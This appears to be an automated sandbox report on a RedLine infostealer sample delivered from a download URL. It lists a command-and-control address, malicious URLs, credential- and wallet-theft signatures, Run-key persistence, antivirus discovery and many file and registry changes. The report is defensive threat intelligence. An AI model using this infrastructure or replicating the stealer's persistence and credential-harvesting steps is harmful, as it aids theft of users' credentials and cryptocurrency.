redline | hxxps://download[.]tglobal[.]cl/

Analysis

max time kernel
426s
max time network
419s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
12-06-2024 10:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://download.tglobal.cl/

Score

10^/10

redline n1 discovery execution infostealer motw persistence phishing spyware stealer

Malware Config

Extracted

Family

redline

Botnet

45.89.53.206:4663

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral4/memory/3052-6513-0x0000000008140000-0x0000000008192000-memory.dmp	family_redline
behavioral4/memory/5212-6697-0x0000000000F90000-0x0000000000FE2000-memory.dmp	family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

Blind.pif

description pid process target process

PID 4568 created 3404 4568 Blind.pif Explorer.EXE
Blocklisted process makes network request 4 IoCs

Processes:

msiexec.exepowershell.exepowershell.exe

flow pid process

15 1740 msiexec.exe
16 1740 msiexec.exe
30 3052 powershell.exe
31 852 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

852 powershell.exe
3052 powershell.exe
4432 powershell.exe
3852 powershell.exe
5424 powershell.exe
960 powershell.exe
2144 powershell.exe

description	pid	process	target process
PID 4568 created 3404	4568	Blind.pif	Explorer.EXE

flow	pid	process
15	1740	msiexec.exe
16	1740	msiexec.exe
30	3052	powershell.exe
31	852	powershell.exe

pid	process
852	powershell.exe
3052	powershell.exe
4432	powershell.exe
3852	powershell.exe
5424	powershell.exe
960	powershell.exe
2144	powershell.exe

Executes dropped EXE 13 IoCs

Processes:

python_x86_Lib.exeITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeSetup.exeComputerDefaults.exeBlind.pifRmmService.exeRmmService.exeITSMAgent.exeITSMAgent.exeRegAsm.exe

pid	process
4744	python_x86_Lib.exe
3028	ITSMService.exe
4752	ITSMAgent.exe
4160	ITSMAgent.exe
1252	ITSMAgent.exe
2360	Setup.exe
1772	ComputerDefaults.exe
4568	Blind.pif
2440	RmmService.exe
1652	RmmService.exe
6072	ITSMAgent.exe
648	ITSMAgent.exe
5212	RegAsm.exe

Loads dropped DLL 64 IoCs

Processes:

MsiExec.exeMsiExec.exeITSMService.exeITSMAgent.exeITSMAgent.exeITSMAgent.exeComputerDefaults.exeRmmService.exe

pid	process
4664	MsiExec.exe
4664	MsiExec.exe
4664	MsiExec.exe
4664	MsiExec.exe
3892	MsiExec.exe
3892	MsiExec.exe
3892	MsiExec.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
3028	ITSMService.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4160	ITSMAgent.exe
4160	ITSMAgent.exe
4160	ITSMAgent.exe
4160	ITSMAgent.exe
4160	ITSMAgent.exe
4160	ITSMAgent.exe
4160	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
1252	ITSMAgent.exe
1252	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
4752	ITSMAgent.exe
3892	MsiExec.exe
1772	ComputerDefaults.exe
2440	RmmService.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Endpoint Manager = "C:\\Program Files (x86)\\ITarian\\Endpoint Manager\\ITSMAgent.exe"	msiexec.exe

Checks for any installed AV software in registry 1 TTPs 8 IoCs

Security Software Discovery

T1518.001

Processes:

ITSMService.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm\	ITSMService.exe
Delete value	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm\RemovalSecurity	ITSMService.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm\RemovalSecurity	ITSMService.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm	ITSMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm	ITSMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	ITSMService.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	ITSMService.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS\Esm	ITSMService.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs
phishing motw

Processes:

flow ioc

6 https://ertytvm.xyz/?FCmkiNRLh0Y2BHeutdTwaKGo54Mfs6-xIzrmYvfqdQhHKX4B1CPNVREiawejpUG3Lo7WMuF9A8c-Mf62jtxdLuv8WekyJqrXRI

flow	ioc
6	https://ertytvm.xyz/?FCmkiNRLh0Y2BHeutdTwaKGo54Mfs6-xIzrmYvfqdQhHKX4B1CPNVREiawejpUG3Lo7WMuF9A8c-Mf62jtxdLuv8WekyJqrXRI

Drops file in System32 directory 6 IoCs

Processes:

ITSMService.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ITSMService.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ITSMService.exe

Drops file in Program Files directory 64 IoCs

Processes:

python_x86_Lib.exemsiexec.exe

description	ioc	process
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\DLLs\_ssl.pyd	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\lib2to3\fixes\fix_exitfunc.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\progress\bar.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\demos\style.tcl	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\distlib\locators.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Araguaina	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Dublin	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\demos\square	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\demos\text.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\rmmproxy.dll	msiexec.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\DLLs\py.ico	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\md5.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\msgs\sw.msg	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Rangoon	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Europe\Tallinn	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\compat\__init__.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\html5lib\treebuilders\dom.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Panama	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\scrlbar.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Dominica	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Asia\Sakhalin	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\bitmaps\plusarm.xbm	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\toaiff.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\ttk\clamTheme.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\codeop.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\compiler\ast.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\cp720.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\idlelib\Bindings.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\idlelib\MultiCall.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\easy_install.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Pacific\Pohnpei	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\fs.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\cp1006.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\encodings\iso2022_jp_2004.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\MimeWriter.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\plistlib.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\gyp-0.1-py2.7.egg\gyp\generator\gypsh.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\html5lib\inputstream.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\utils\build.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\html5lib\sanitizer.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\requests\packages\chardet\big5prober.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\sndhdr.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\msgs\en_be.msg	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\xml\dom\minidom.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\setuptools-18.2.dist-info\DESCRIPTION.rst	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\setuptools-18.2.dist-info\top_level.txt	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\America\Dawson	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\VTree.tcl	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\dialog.tcl	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\gyp-0.1-py2.7.egg\gyp\easy_xml.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\colorama\ansitowin32.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Africa\Djibouti	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\distlib\scripts.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\encoding\cp862.enc	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tk8.5\ttk\button.tcl	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\_vendor\lockfile\__init__.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\doctest.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\lib2to3\fixer_util.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\mhlib.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tcl8.5\tzdata\Australia\Broken_Hill	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\tix8.4.3\bitmaps\ck_def.xbm	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\idlelib\EditorWindow.py	python_x86_Lib.exe
File opened for modification	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\new.py	python_x86_Lib.exe
File created	C:\Program Files (x86)\ITarian\Endpoint Manager\Lib\site-packages\pip\commands\uninstall.py	python_x86_Lib.exe

Drops file in Windows directory 23 IoCs

Processes:

msiexec.exeMsiExec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI8142.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{CA6B5E30-616B-4A5E-BC20-52629865CC0A}\icon.ico	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8C7F.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFD0C06BBE907A51E0.TMP	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI79AC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\SystemTemp\~DF45B72E223CC16C6F.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C1F.tmp	msiexec.exe
File created	C:\Windows\Installer\e5c779b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI81B1.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{CA6B5E30-616B-4A5E-BC20-52629865CC0A}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\e5c7799.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{CA6B5E30-616B-4A5E-BC20-52629865CC0A}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C30.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7C5F.tmp	msiexec.exe
File created	C:\Windows\Installer\{CA6B5E30-616B-4A5E-BC20-52629865CC0A}\icon.ico	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9819.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF0B12FB72872C0D4D.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\e5c7799.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7A59.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF20DF57A84DA4C7C8.TMP	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4664 tasklist.exe
1608 tasklist.exe

pid	process
4664	tasklist.exe
1608	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies data under HKEY_USERS 58 IoCs

Processes:

ITSMService.exemsiexec.exepython_x86_Lib.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	ITSMService.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	ITSMService.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{289AF617-1CC3-42A6-926C-E6A863F0E3BA} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 01000000000000003d0cf828b5bcda01	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	ITSMService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	ITSMService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	ITSMService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	python_x86_Lib.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	python_x86_Lib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	ITSMService.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	ITSMService.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{35786D3C-B075-49B9-88DD-029876E11C01} {ADD8BA80-002B-11D0-8F0F-00C04FD7D062} 0xFFFF = 0100000000000000a05df828b5bcda01	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	python_x86_Lib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b\52C64B7E	ITSMService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	python_x86_Lib.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	ITSMService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	ITSMService.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	ITSMService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	python_x86_Lib.exe

Modifies registry class 27 IoCs

Processes:

msiexec.exeITSMService.exechrome.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\ProductName = "Endpoint Manager Communication Client"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Language = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\03E5B6ACB616E5A4CB0225268956CCA0\SourceList\Media	msiexec.exe
